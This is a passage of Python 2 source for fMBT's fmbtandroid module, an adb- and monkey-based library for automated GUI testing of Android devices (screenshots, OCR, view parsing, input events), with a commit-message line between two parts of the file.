Screenshot class takes and holds a screenshot (bitmap) of device
display, or a forced bitmap file if device connection is not given.
"""
def __init__(self, screenshotFile=None, pathSolver=None, screenSize=None):
self._filename = screenshotFile
self._pathSolver = pathSolver
self._screenSize = screenSize
# The bitmap held inside screenshot object is never updated.
# If new screenshot is taken, this screenshot object disappears.
# => cache all search hits
self._cache = {}
self._ocrWords = None
self._ocrPreprocess = _OCRPREPROCESS
def dumpOcrWords(self, preprocess=None):
self._assumeOcrWords(preprocess=preprocess)
w = []
for ppfilter in self._ocrWords:
for word in self._ocrWords[ppfilter]:
for appearance, (wid, middle, bbox) in enumerate(self._ocrWords[ppfilter][word]):
(x1, y1, x2, y2) = bbox
w.append((word, x1, y1))
return sorted(set(w), key=lambda i:(i[2]/8, i[1]))
def filename(self):
return self._filename
def findItemsByBitmap(self, bitmap, colorMatch=1.0, area=(0.0, 0.0, 1.0, 1.0)):
bitmap = self._pathSolver(bitmap)
if (bitmap, colorMatch) in self._cache:
return self._cache[(bitmap, colorMatch)]
eyenfinger.iRead(source=self._filename, ocr=False)
try:
score, bbox = eyenfinger.iVerifyIcon(bitmap, colorMatch=colorMatch, opacityLimit=.95, area=area)
foundItem = self._item("bitmap", bbox, bitmap=bitmap)
self._cache[(bitmap, colorMatch)] = [foundItem]
except eyenfinger.BadMatch:
_adapterLog('findItemsByBitmap no match for "%s" in "%s"' % (bitmap, self._filename))
self._cache[(bitmap, colorMatch)] = []
return self._cache[(bitmap, colorMatch)]
def findItemsByOcr(self, text, preprocess=None, match=1.0):
self._assumeOcrWords(preprocess=preprocess)
for ppfilter in self._ocrWords.keys():
try:
eyenfinger._g_words = self._ocrWords[ppfilter]
(score, word), bbox = eyenfinger.iVerifyWord(text, match=match)
break
except eyenfinger.BadMatch:
continue
else:
return []
return [self._item("OCR word", bbox, ocrFind=text, ocrFound=word)]
def save(self, fileOrDirName):
shutil.copy(self._filename, fileOrDirName)
def _assumeOcrWords(self, preprocess=None):
if self._ocrWords == None:
if preprocess == None:
preprocess = self._ocrPreprocess
if not type(preprocess) in (list, tuple):
preprocess = [preprocess]
self._ocrWords = {}
for ppfilter in preprocess:
pp = ppfilter % { "zoom": "-resize %sx" % (self._screenSize[0] * 2) }
eyenfinger.iRead(source=self._filename, ocr=True, preprocess=pp)
self._ocrWords[ppfilter] = eyenfinger._g_words
def _item(self, className, (x1, y1, x2, y2), bitmap=None, ocrFind=None, ocrFound=None):
return ViewItem(
className, None, 0,
{"layout:mLeft": x1,
"layout:mTop": y1,
"layout:getHeight()": y2-y1,
"layout:getWidth()": x2-x1,
"screenshot": self._filename,
"bitmap": bitmap,
"ocrFind": ocrFind,
"ocrFound": ocrFound,
},
None, "")
def __str__(self):
return 'Screenshot(filename="%s")' % (self._filename,)
class ViewItem(object):
"""
ViewItem holds the information of a single GUI element.
"""
def __init__(self, className, code, indent, properties, parent, rawProps):
self._className = className
self._code = code
self._indent = indent
self._p = properties
self._parent = parent
self._children = []
self._bbox = []
self._rawProps = ""
if not "scrolling:mScrollX" in self._p:
self._p["scrolling:mScrollX"] = 0
self._p["scrolling:mScrollY"] = 0
def addChild(self,child): self._children.append(child)
def bbox(self):
if self._bbox == []:
left = int(self._p["layout:mLeft"])
top = int(self._p["layout:mTop"])
parent = self._parent
while parent:
pp = parent._p
left += int(pp["layout:mLeft"]) - int(pp["scrolling:mScrollX"])
top += int(pp["layout:mTop"]) - int(pp["scrolling:mScrollY"])
parent = parent._parent
height = int(self._p["layout:getHeight()"])
width = int(self._p["layout:getWidth()"])
self._bbox = (left, top, left + width, top + height)
return self._bbox
def children(self): return self._children
def className(self): return self._className
def code(self): return self._code
def coords(self):
left, top, right, bottom = self.bbox()
return (left + (right-left)/2, top + (bottom-top)/2)
def indent(self): return self._indent
def id(self): return self.property("mID")
def parent(self): return self._parent
def properties(self): return self._p
def property(self, propertyName):
return self._p.get(propertyName, None)
def text(self): return self.property("text:mText")
def visible(self):
return self._p.get("getVisibility()", "") == "VISIBLE"
def dump(self):
p = self._p
return ("ViewItem(\n\tchildren = %d\n\tclassName = '%s'\n\tcode = '%s'\n\t" +
"indent = %d\n\tproperties = {\n\t\t%s\n\t})") % (
len(self._children), self._className, self._code, self._indent,
'\n\t\t'.join(['"%s": %s' % (key, p[key]) for key in sorted(p.keys())]))
def __str__(self):
return ("ViewItem(className='%s', id=%s, bbox=%s)" % (
self._className, self.id(), self.bbox()))
class View(object):
"""
View provides interface to screen dumps from Android. It parses
the dump to a hierarchy of ViewItems. find* methods enable searching
for ViewItems based on their properties.
"""
def __init__(self, screenshotDir, serialNumber, dump):
self.screenshotDir = screenshotDir
self.serialNumber = serialNumber
self._viewItems = []
self._errors = []
self._lineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>[0-9A-Fa-f]{8} )(?P<properties>.*)")
self._olderAndroidLineRegEx = re.compile("(?P<indent>\s*)(?P<class>[\w.$]+)@(?P<id>\w)(?P<properties>.*)")
self._propRegEx = re.compile("(?P<prop>(?P<name>[^=]+)=(?P<len>\d+),)(?P<data>[^\s]* ?)")
self._dump = dump
self._rawDumpFilename = self.screenshotDir + os.sep + _filenameTimestamp() + "-" + self.serialNumber + ".view"
file(self._rawDumpFilename, "w").write(self._dump)
try: self._parseDump(dump)
except Exception, e:
self._errors.append((-1, "", "Parser error"))
def viewItems(self): return self._viewItems
def errors(self): return self._errors
def dumpRaw(self): return self._dump
def dumpItems(self, itemList = None):
if itemList == None: itemList = self._viewItems
l = []
for i in itemList:
l.append(self._dumpItem(i))
return '\n'.join(l)
def dumpTree(self, rootItem = None):
l = []
if rootItem != None:
l.extend(self._dumpSubTree(rootItem, 0))
else:
for i in self._viewItems:
if i._indent == 0:
l.extend(self._dumpSubTree(i, 0))
return '\n'.join(l)
def _dumpSubTree(self, viewItem, indent):
l = []
i = viewItem
l.append(" "*indent + self._dumpItem(viewItem))
for i in viewItem.children():
l.extend(self._dumpSubTree(i, indent + 4))
return l
def _dumpItem(self, viewItem):
i = viewItem
if i.text() != None: t = '"%s"' % (i.text(),)
else: t = None
return "id=%s cls=%s text=%s bbox=%s" % (
i.id(), i.className(), t, i.bbox())
def findItems(self, comparator, count=-1, searchRootItem=None, searchItems=None):
foundItems = []
if count == 0: return foundItems
if searchRootItem != None:
# find from searchRootItem and its children
if comparator(searchRootItem):
foundItems.append(i)
for c in searchRootItem.children():
foundItems.extend(self.findItems(comparator, count=count-len(foundItems), searchRootItem=c))
else:
if searchItems != None:
# find from listed items only
searchDomain = searchItems
else:
# find from all items
searchDomain = self._viewItems
for i in searchDomain:
if comparator(i):
foundItems.append(i)
if count > 0 and len(foundItems) >= count:
break
return foundItems
def findItemsByText(self, text, partial=False, count=-1, searchRootItem=None, searchItems=None):
"""
Searches the GUI hiearhy for a object with a given text
"""
if partial:
c = lambda item: (
item.properties().get("text:mText", "").find(text) != -1 )
else:
c = lambda item: (
item.properties().get("text:mText", None) == text )
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsById(self, id, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item.properties().get("mID", "") == id
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByClass(self, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
if partial: c = lambda item: item.className().find(className) != -1
else: c = lambda item: item.className() == className
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def findItemsByIdAndClass(self, id, className, partial=True, count=-1, searchRootItem=None, searchItems=None):
idOk = self.findItemsById(id, count=-1, searchRootItem=searchRootItem)
return self.findItemsByClass(className, partial=partial, count=count, searchItems=idOk)
def findItemsByRawProps(self, s, count=-1, searchRootItem=None, searchItems=None):
c = lambda item: item._rawProps.find(s) != -1
return self.findItems(c, count=count, searchRootItem=searchRootItem, searchItems=searchItems)
def save(self, fileOrDirName):
shutil.copy(self._rawDumpFilename, fileOrDirName)
def _parseDump(self, dump):
"""
Process the raw dump data and create a tree of ViewItems
"""
# This code originates from tema-android-adapter-3.2,
# AndroidAdapter/guireader.py.
self._viewItems = []
cellLayout = ""
parent = None
previousItem = None
currentIndent = 0
visible = True
self.TOP_PAGED_VIEW = ""
for lineIndex, line in enumerate(dump.splitlines()):
if line == "DONE.":
break
# separate indent, class and properties for each GUI object
# TODO: branch here according to self._androidVersion
matcher = self._lineRegEx.match(line)
if not matcher:
# FIXME: this hack falls back to old format,
# should branch according to self._androidVersion!
matcher = self._olderAndroidLineRegEx.match(line)
if not matcher:
self._errors.append((lineIndex + 1, line, "Illegal line"))
continue # skip this line
className = matcher.group("class")
# Indent specifies the hierarchy level of the object
indent = len(matcher.group("indent"))
# If the indent is bigger that previous, this object is a
# child for the previous object
if indent > currentIndent:
parent = self._viewItems[-1]
elif indent < currentIndent:
for tmp in range(0, currentIndent - indent):
parent = parent.parent()
currentIndent = indent
propertiesData = matcher.group("properties")
properties = {}
index = 0
x = 0
y = 0
# Process the properties of each GUI object
while index < len(propertiesData):
# Separate name and value for each property [^=]*=
propMatch = self._propRegEx.match(propertiesData[index:-1])
if not propMatch or len(propMatch.group("data")) < int(propMatch.group("len")):
if not propMatch.group("data"):
self._errors.append((lineIndex, propertiesData[index:-1], "Illegal property"))
return None
startFrom = index + propertiesData[index:-1].find(propMatch.group("data"))
currFixedData = propertiesData[startFrom:(startFrom + int(propMatch.group("len")))]
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = currFixedData[0:length].lstrip()
else:
length = int(propMatch.group("len"))
# [^=]+=?, == data
properties[propMatch.group("name")] = propMatch.group("data")[0:length].lstrip()
index += len(propMatch.group("prop")) + length + 1
self._viewItems.append(ViewItem(matcher.group("class"), matcher.group("id"), indent, properties, parent, matcher.group("properties")))
if parent:
parent.addChild(self._viewItems[-1])
return self._viewItems
def __str__(self):
return 'View(items=%s, dump="%s")' % (
len(self._viewItems), self._rawDumpFilename)
class _AndroidDeviceConnection:
"""
Connection to the Android Device being tested.
"""
_m_host = 'localhost'
_m_port = random.randint(20000, 29999)
_w_host = 'localhost'
_w_port = _m_port + 1
def __init__(self, serialNumber, stopOnError=True):
self._serialNumber = serialNumber
self._stopOnError = stopOnError
self._shellSupportsTar = False
try:
self._resetMonkey()
self._resetWindow()
# check supported features
outputLines = self._runAdb("shell tar")[1].splitlines()
if len(outputLines) == 1 and "bin" in outputLines[0]:
self._shellSupportsTar = False
else:
self._shellSupportsTar = True
finally:
# Next _AndroidDeviceConnection instance will use different ports
self._w_port = _AndroidDeviceConnection._w_port
self._m_port = _AndroidDeviceConnection._m_port
_AndroidDeviceConnection._w_port += 100
_AndroidDeviceConnection._m_port += 100
def __del__(self):
try: self._monkeySocket.close()
except: pass
def _cat(self, remoteFilename):
fd, filename = tempfile.mkstemp("fmbtandroid-cat-")
os.close(fd)
self._runAdb("pull '%s' %s" % (remoteFilename, filename), 0)
contents = file(filename).read()
os.remove(filename)
return contents
def _runAdb(self, command, expectedExitStatus=0):
if not self._stopOnError:
expect = None
else:
expect = expectedExitStatus
if type(command) == list:
command = ["adb", "-s", self._serialNumber] + command
else:
command = ("adb -s '%s' " % (self._serialNumber,)) + command
return _run(command, expectedExitStatus = expect)
def _runSetupCmd(self, cmd, expectedExitStatus = 0):
_adapterLog('setting up connections: "%s"' % (cmd,))
exitStatus, _, _ = self._runAdb(cmd, expectedExitStatus)
if exitStatus == 0: return True
else: return True
def _resetWindow(self):
setupCommands = ["shell service call window 1 i32 4939",
"forward tcp:%s tcp:4939" % (self._w_port,)]
for c in setupCommands:
self._runSetupCmd(c)
def _resetMonkey(self, timeout=3, pollDelay=.25):
self._runSetupCmd("shell monkey --port 1080", None)
time.sleep(pollDelay)
endTime = time.time() + timeout
while time.time() < endTime:
self._runSetupCmd("forward tcp:%s tcp:1080" % (self._m_port,), 0)
try:
self._monkeySocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._monkeySocket.connect((self._m_host, self._m_port))
self._monkeySocket.setblocking(0)
self._monkeySocket.settimeout(1.0)
self._platformVersion = self._monkeyCommand("getvar build.version.release", retry=0)[1]
if len(self._platformVersion) > 0:
self._monkeySocket.settimeout(5.0)
return True
except Exception, e:
pass
time.sleep(pollDelay)
if self._stopOnError:
msg = 'Android monkey error: cannot connect to "adb shell monkey --port 1080" to device %s' % (self._serialNumber)
_adapterLog(msg)
raise AndroidConnectionError(msg)
else:
return False
def _monkeyCommand(self, command, retry=3):
try:
self._monkeySocket.sendall(command + "\n")
data = self._monkeySocket.recv(4096).strip()
if len(data) == 0 and retry > 0:
return self._monkeyCommand(command, retry-1)
if data == "OK":
return True, None
elif data.startswith("OK:"):
return True, data.split("OK:")[1]
_adapterLog("monkeyCommand failing... command: '%s' response: '%s'" % (command, data))
return False, None
except socket.error:
try: self.sock.close()
except: pass
if retry > 0:
self._resetMonkey()
return self._monkeyCommand(command, retry=retry-1)
else:
raise AndroidConnectionError('Android monkey socket connection lost while sending command "%s"' % (command,))
def reboot(self, reconnect, firstBootAfterFlashing, timeout):
if firstBootAfterFlashing:
self._runAdb("root")
time.sleep(2)
self._runAdb("shell rm /data/data/com.android.launcher/shared_prefs/com.android.launcher2.prefs.xml")
self._runAdb("reboot")
_adapterLog("rebooting " + self._serialNumber)
if reconnect:
self._runAdb("wait-for-device")
endTime = time.time() + timeout
while time.time() < endTime:
try:
if self._resetMonkey(timeout=1, pollDelay=1):
break
except AndroidConnectionError:
pass
time.sleep(1)
else:
_adapterLog("reboot: reconnecting to " + self._serialNumber + " failed")
return False
self._resetWindow()
return True
def recvVariable(self, variableName):
ok, value = self._monkeyCommand("getvar " + variableName)
if ok: return value
else:
# LOG: getvar variableName failed
return None
def recvScreenSize(self):
try:
height = int(self.recvVariable("display.height"))
width = int(self.recvVariable("display.width"))
except TypeError:
return None, None
return width, height
def recvTopAppWindow(self):
_, output, _ = self._runAdb("shell dumpsys window", 0)
if self._platformVersion >= "4.2":
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8})( [^ ]*)? (?P<winName>[^}]*)\}", output)
else:
s = re.findall("mCurrentFocus=Window\{(#?[0-9A-Fa-f]{8}) (?P<winName>[^ ]*) [^ ]*\}", output)
if s and len(s[0][-1].strip()) > 1: topWindowName = s[0][-1]
else: topWindowName = None
s = re.findall("mFocusedApp=AppWindowToken.*ActivityRecord\{#?[0-9A-Fa-f]{8}( [^ ]*)? (?P<appName>[^}]*)\}", output)
if s and len(s[0][-1].strip()) > 1:
topAppName = s[0][-1].strip()
else:
topAppName = None
return topAppName, topWindowName
def sendTap(self, xCoord, yCoord):
return self._monkeyCommand("tap " + str(xCoord) + " " + str(yCoord))[0]
def sendKeyUp(self, key):
return self._monkeyCommand("key up " + key)[0]
def sendKeyDown(self, key):
return self._monkeyCommand("key down " + key)[0]
def sendTouchUp(self, xCoord, yCoord):
return self._monkeyCommand("touch up " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchDown(self, xCoord, yCoord):
return self._monkeyCommand("touch down " + str(xCoord) + " " + str(yCoord))[0]
def sendTouchMove(self, xCoord, yCoord):
return self._monkeyCommand("touch move " + str(xCoord) + " " + str(yCoord))[0]
def sendTrackBallMove(self, dx, dy):
return self._monkeyCommand("trackball " + str(dx) + " " + str(dy))[0]
def sendPress(self, key):
return self._monkeyCommand("press " + key)[0]
def sendType(self, text):
return self._monkeyCommand("type " + text)[0]
def screenshot(self, screenshotDir=None, imageFilename=None):
"""
Capture a screenshot and copy the image file to given path or
system temp folder.
Returns screenshot filename.
"""
if imageFilename == None:
filename = _filenameTimestamp() + "-" + self._serialNumber + '.png'
else:
filename = imageFilename
remotefile = '/sdcard/' + filename
status, _, _ = self._runAdb(['shell', 'screencap', '-p', remotefile], 0)
if status != 0: return None
if screenshotDir == None:
status, _, _ = self._runAdb(['pull', remotefile, tempfile.gettempdir()], 0)
else:
status, _, _ = self._runAdb(['pull', remotefile, os.path.join(screenshotDir, filename)], 0)
if status != 0: return None
status, _, _ = self._runAdb(['shell','rm', remotefile], 0)
if screenshotDir == None:
return os.path.join(tempfile.gettempdir(), filename)
else:
return os.path.join(screenshotDir, filename)
def shellSOE(self, shellCommand):
fd, filename = tempfile.mkstemp(prefix="fmbtandroid-shellcmd-")
remotename = '/sdcard/' + os.path.basename(filename)
os.write(fd, shellCommand + "\n")
os.close(fd)
self._runAdb("push %s %s" % (filename, remotename), 0)
cmd = "shell 'source %s >%s.out 2>%s.err; echo $? > %s.status" % ((remotename,)*4)
if self._shellSupportsTar:
# do everything we can in one command to minimise adb
# commands: execute command, record results, package,
# print uuencoded package and remove remote temp files
cmd += "; cd %s; tar czf - %s.out %s.err %s.status | uuencode %s.tar.gz; rm -f %s*'" % (
(os.path.dirname(remotename),) + ((os.path.basename(remotename),) * 5))
status, output, error = self._runAdb(cmd, 0)
file(filename, "w").write(output)
uu.decode(filename, out_file=filename + ".tar.gz")
import tarfile
tar = tarfile.open(filename + ".tar.gz")
basename = os.path.basename(filename)
stdout = tar.extractfile(basename + ".out").read()
stderr = tar.extractfile(basename + ".err").read()
try: exitstatus = int(tar.extractfile(basename + ".status").read())
except: exitstatus = None
os.remove(filename)
os.remove(filename + ".tar.gz")
else:
# need to pull files one by one, slow.
cmd += "'"
self._runAdb(cmd, 0)
stdout = self._cat(remotename + ".out")
stderr = self._cat(remotename + ".err")
try: exitstatus = int(self._cat(remotename + ".status"))
except: exitstatus = None
self._runAdb("shell rm -f %s.out %s.err %.status" % ((remotename,)*3))
return exitstatus, stdout, stderr
def recvViewData(self, retry=3):
_dataBufferLen = 4096 * 16
try:
self._windowSocket = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
self._windowSocket.connect( (self._w_host, self._w_port) )
# DUMP -1: get foreground window info
if self._windowSocket.sendall("DUMP -1\n") == 0:
# LOG: readGUI cannot write to window socket
raise AdapterConnectionError("writing socket failed")
# Read until a "DONE" line
data = ""
while True:
try: newData = self._windowSocket.recv(_dataBufferLen)
except socket.timeout:
continue
data += newData
if data.splitlines()[-1] == "DONE" or newData == '':
break
return data
except Exception, msg:
_adapterLog("recvViewData: window socket error: %s" % (msg,))
if retry > 0:
self._resetWindow()
return self.recvViewData(retry=retry-1)
else:
msg = "recvViewData: cannot read window socket"
_adapterLog(msg)
raise AndroidConnectionError(msg)
finally:
try: self._windowSocket.close()
except: pass
class AndroidConnectionError(Exception): pass
class AndroidConnectionLost(AndroidConnectionError): pass
class AndroidDeviceNotFound(AndroidConnectionError): pass
fmbtandroid: fixed tapBitmap colorMatch and area parameters
# fMBT, free Model Based Testing tool
# Copyright (c) 2013, Intel Corporation.
#
# This program is free software; you can redistribute it and/or modify it
# under the terms and conditions of the GNU Lesser General Public License,
# version 2.1, as published by the Free Software Foundation.
#
# This program is distributed in the hope it will be useful, but WITHOUT
# ANY WARRANTY; without even the implied warranty of MERCHANTABILITY or
# FITNESS FOR A PARTICULAR PURPOSE. See the GNU Lesser General Public License for
# more details.
#
# You should have received a copy of the GNU Lesser General Public License along with
# this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin St - Fifth Floor, Boston, MA 02110-1301 USA.
#
#
# View._parseDump method contains code that has been published as part
# of the TEMA tool, under the MIT open source license:
#
# Copyright (c) 2006-2010 Tampere University of Technology
#
# Permission is hereby granted, free of charge, to any person obtaining
# a copy of this software and associated documentation files (the
# "Software"), to deal in the Software without restriction, including
# without limitation the rights to use, copy, modify, merge, publish,
# distribute, sublicense, and/or sell copies of the Software, and to
# permit persons to whom the Software is furnished to do so, subject to
# the following conditions:
#
# The above copyright notice and this permission notice shall be
# included in all copies or substantial portions of the Software.
#
# THE SOFTWARE IS PROVIDED "AS IS", WITHOUT WARRANTY OF ANY KIND,
# EXPRESS OR IMPLIED, INCLUDING BUT NOT LIMITED TO THE WARRANTIES OF
# MERCHANTABILITY, FITNESS FOR A PARTICULAR PURPOSE AND
# NONINFRINGEMENT. IN NO EVENT SHALL THE AUTHORS OR COPYRIGHT HOLDERS BE
# LIABLE FOR ANY CLAIM, DAMAGES OR OTHER LIABILITY, WHETHER IN AN ACTION
# OF CONTRACT, TORT OR OTHERWISE, ARISING FROM, OUT OF OR IN CONNECTION
# WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE SOFTWARE.
"""
This library provides a test interface to Android devices.
Device class implements a test interface that is based on Android
Debug Bridge (adb) and Android monkey.
Device's refreshScreenshot() returns a Screenshot object, from which
bitmaps can be searched for.
Device's refreshView() returns a View object, from which UI elements
can be searched according to their id, class, text and other
properties.
Using this library requires that adb is in PATH.
Tips & tricks
-------------
Take a screenshot and save it to a file
import fmbtandroid
fmbtandroid.Device().refreshScreenshot().save("/tmp/screen.png")
* * *
Print view items on device display
import fmbtandroid
print fmbtandroid.Device().refreshView().dumpTree()
* * *
Save generated device ini for modifications
import fmbtandroid
file("/tmp/mydevice.ini", "w").write(fmbtandroid.Device().dumpIni())
* * *
Connect to device based on an ini file
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.pressHome()
* * *
Open screenlock by swiping lock.png bitmap on the display to the
east. The lock.png file needs to be in bitmapPath defined in
mydevice.ini.
import fmbtandroid
d = fmbtandroid.Device(iniFile=file("/tmp/mydevice.ini"))
d.refreshScreenshot()
d.swipeBitmap("lock.png", "east")
* * *
Execute a shell command on Android device, show exit status, standard
output and standard error:
import fmbtandroid
status, out, err = fmbtandroid.Device().shellSOE("mkdir /proc/foo")
print 'status: %s, stdout: "%s", stderr: "%s"' % (status, out, err)
* * *
Enable extensive logging with fmbtlogger. You can use functions or
file objects as backends. Example: log to standard output
import fmbtandroid
import fmbtlogger
import sys
d = fmbtandroid.Device()
d = fmbtlogger.text(d, sys.stdout, logDepth=-1)
d.pressPower()
"""
DEVICE_INI_DEFAULTS = '''
[objects]
appsButtonId = id/0x0
appsButtonClass = BubbleTextView
; [application.NAME] sections:
; gridname = exact caption of the application in application grid (text
; property)
; window = string included in topWindow() when application is running
[homescreen]
window = Launcher
'''
import commands
import datetime
import os
import random
import re
import shutil
import socket
import StringIO
import subprocess
import tempfile
import time
import uu
import eyenfinger
import fmbt
_OCRPREPROCESS = [
'-sharpen 5 -level 60%%,60%%,1.0 -filter Mitchell %(zoom)s',
'-sharpen 5 -level 90%%,100%%,3.0 -filter Mitchell -sharpen 5'
]
def _adapterLog(msg):
fmbt.adapterlog("fmbtandroid: %s" % (msg,))
def _logFailedCommand(source, command, exitstatus, stdout, stderr):
_adapterLog('in %s command "%s" failed:\n output: %s\n error: %s\n status: %s' %
(source, command, stdout, stderr, exitstatus))
def _fmbtLog(msg):
fmbt.fmbtlog("fmbtandroid: %s" % (msg,))
def _filenameTimestamp():
return datetime.datetime.now().strftime("%Y%m%d-%H%M%S-%f")
def _run(command, expectedExitStatus = None):
if type(command) == str: shell=True
else: shell=False
try:
p = subprocess.Popen(command, shell=shell,
stdout=subprocess.PIPE,
stderr=subprocess.PIPE,
close_fds=True)
if expectedExitStatus != None:
out, err = p.communicate()
else:
out, err = ('', None)
except Exception, e:
class fakeProcess(object): pass
p = fakeProcess
p.returncode = 127
out, err = ('', e)
exitStatus = p.returncode
if expectedExitStatus != None:
if ((type(expectedExitStatus) in [list, tuple] and
not exitStatus in expectedExitStatus) or
(type(expectedExitStatus) == int and
not exitStatus == expectedExitStatus)):
msg = 'Unexpected exit status %s from command "%s".\n Output: %s\n Error: %s' % (
exitStatus, command, out, err)
_adapterLog(msg)
if "error: device not found" in err:
raise AndroidDeviceNotFound(msg)
else:
raise Exception(msg)
return (exitStatus, out, err)
def _bitmapPathSolver(fmbtAndroidHomeDir, bitmapPath):
def _solver(bitmap, checkReadable=True):
if bitmap.startswith("/") or os.access(bitmap, os.R_OK):
path = [os.path.dirname(bitmap)]
bitmap = os.path.basename(bitmap)
else:
path = []
for singleDir in bitmapPath.split(":"):
if not singleDir.startswith("/"):
path.append(os.path.join(fmbtAndroidHomeDir, singleDir))
else:
path.append(singleDir)
for singleDir in path:
retval = os.path.join(singleDir, bitmap)
if not checkReadable or os.access(retval, os.R_OK):
break
if checkReadable and not os.access(retval, os.R_OK):
raise ValueError('Bitmap "%s" not readable in bitmapPath %s' % (bitmap, ':'.join(path)))
return retval
return _solver
class Device(object):
"""
The Device class provides
- keywords as its methods
- device properties from device's INI file
- view() returns the most recently refreshed View, that contains
items parsed from window dump.
- screenshot() returns the most recently refreshed Screenshot,
bitmaps can be searched from this.
"""
_PARSE_VIEW_RETRY_LIMIT = 10
def __init__(self, deviceName=None, iniFile=None, connect=True):
"""
Connect to given device, or the first not-connected Android
device in the "adb devices" list, if nothing is defined.
Parameters:
deviceName (string, optional):
If deviceName is a device serial number (an item in
the left most column in "adb devices"), connect to
that device. Device information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
If deviceName is a nick name, device information is
looked for from $FMBTANDROIDHOME/etc/deviceName.ini,
and the connection is established to the device with
the serial number given in the ini file.
The default is None. The first disconnected device
in the "adb devices" list is connected to. Device
information is read from
$FMBTANDROIDHOME/etc/SERIALNUMBER.ini, if it exists.
iniFile (file object, optional):
A file object that contains device information
ini. Connect to the device with a serial number
given in this file. The default is None.
To create an ini file for a device, use dumpIni. Example:
file("/tmp/test.ini", "w").write(fmbtandroid.Device().dumpIni())
"""
self._fmbtAndroidHomeDir = os.getenv("FMBTANDROIDHOME", os.getcwd())
self._screenSize = None
self._platformVersion = None
self._lastView = None
self._lastScreenshot = None
self._longPressHoldTime = 2.0
self._longTapHoldTime = 2.0
self._conf = _DeviceConf()
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
if deviceName == None:
deviceName = self._conf.value("general", "serial", None)
if connect == False and deviceName == None:
deviceName = "nodevice"
self._conn = None
elif deviceName == None:
# Connect to an unspecified device.
# Go through devices in "adb devices".
listDevicesCommand = "adb devices"
status, output, err = _run(listDevicesCommand, expectedExitStatus = [0, 127])
if status == 127:
raise Exception('adb not found in PATH. Check your Android SDK installation.')
outputLines = [l.strip() for l in output.splitlines()]
try: deviceLines = outputLines[outputLines.index("List of devices attached")+1:]
except: deviceLines = []
deviceLines = [l for l in deviceLines if l.strip() != ""]
if deviceLines == []:
raise Exception('No devices found with "%s"' % (listDevicesCommand,))
potentialDevices = [line.split()[0] for line in deviceLines]
for deviceName in potentialDevices:
try:
self.serialNumber = deviceName
self._conf.set("general", "serial", self.serialNumber)
self._conn = _AndroidDeviceConnection(self.serialNumber)
break
except AndroidConnectionError, e:
continue
else:
raise AndroidConnectionError("Could not connect to device(s): %s." % (
", ".join(potentialDevices)))
# Found a device (deviceName).
self._loadDeviceAndTestINIs(self._fmbtAndroidHomeDir, deviceName, iniFile)
else:
# Device name given, find out the serial number to connect to.
# It may be given in device or test run INI files.
self.serialNumber = self._conf.value("general", "serial", deviceName)
if connect:
self._conn = _AndroidDeviceConnection(self.serialNumber)
_deviceIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + deviceName + ".ini"
self.loadConfig(_deviceIniFilename, override=True, level="device")
# Fetch properties from device configuration
self.nickName = self._conf.value("general", "name", deviceName)
self.phoneNumber = self._conf.value("general", "phonenumber")
# Loading platform-specific configuration requires a
# connection to the device for checking the platform version.
_platformIniFilename = self._fmbtAndroidHomeDir + os.sep + "etc" + os.sep + "android" + self.platformVersion() + ".ini"
# would we need a form-factor ini, too?
self.loadConfig(_platformIniFilename, override=False, level="platform")
self.loadConfig(StringIO.StringIO(DEVICE_INI_DEFAULTS), override=False, level="global default")
self.wlanAP = self._conf.value("environment", "wlanAP")
self.wlanPass = self._conf.value("environment", "wlanPass")
self.btName = self._conf.value("environment", "BTName")
self.btAccessory = self._conf.value("environment", "BTAccessory")
self.serverIP = self._conf.value("environment", "ServerIP")
self.androidUser = self._conf.value("environment", "AndroidUser")
self.voiceMailNumber = self._conf.value("environment", "VoiceMailNumber")
if self._conn: hw = self._conn._monkeyCommand("getvar build.device")[1]
else: hw = "nohardware"
self.hardware = self._conf.value("general", "hardware", hw)
self.bitmapPath = self._conf.value("paths", "bitmapPath", self._fmbtAndroidHomeDir + os.sep + "bitmaps" + os.sep + self.hardware + "-" + self.platformVersion() + ":.")
self.screenshotDir = self._conf.value("paths", "screenshotDir", self._fmbtAndroidHomeDir + os.sep + "screenshots")
if not os.path.isdir(self.screenshotDir):
try:
os.makedirs(self.screenshotDir)
_adapterLog('created directory "%s" for screenshots' % (self.screenshotDir,))
except Exception, e:
_adapterLog('creating directory "%s" for screenshots failed: %s' (self.screenshotDir, e))
raise
# Caches
self._itemCache = {}
def callContact(self, contact):
"""
Call to given contact.
Return True if successful, otherwise False.
"""
callCommand = 'service call phone 1 s16 "%s"' % (contact,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callContact", callCommand, status, out, err)
return False
else:
return True
def callNumber(self, number):
"""
Call to given phone number.
Return True if successful, otherwise False.
"""
callCommand = "service call phone 2 s16 %s" % (number,)
status, out, err = self.shellSOE(callCommand)
if status != 0: # TODO: check out/err, too?
_logFailedCommand("callNumber", callCommand, status, out, err)
return False
else:
return True
def close(self):
if hasattr(self, "_conn"):
del self._conn
if hasattr(self, "_lastView"):
del self._lastView
if hasattr(self, "_lastScreenshot"):
del self._lastScreenshot
import gc
gc.collect()
def dumpIni(self):
"""
Returns contents of current device configuration as a string (in
INI format).
"""
return self._conf.dump()
def drag(self, (x1, y1), (x2, y2), delayBetweenMoves=0.01, delayBeforeMoves=0, delayAfterMoves=0, movePoints=20):
"""
Touch the screen on coordinates (x1, y1), drag along straight
line to coordinates (x2, y2), and raise fingertip.
coordinates (floats in range [0.0, 1.0] or integers):
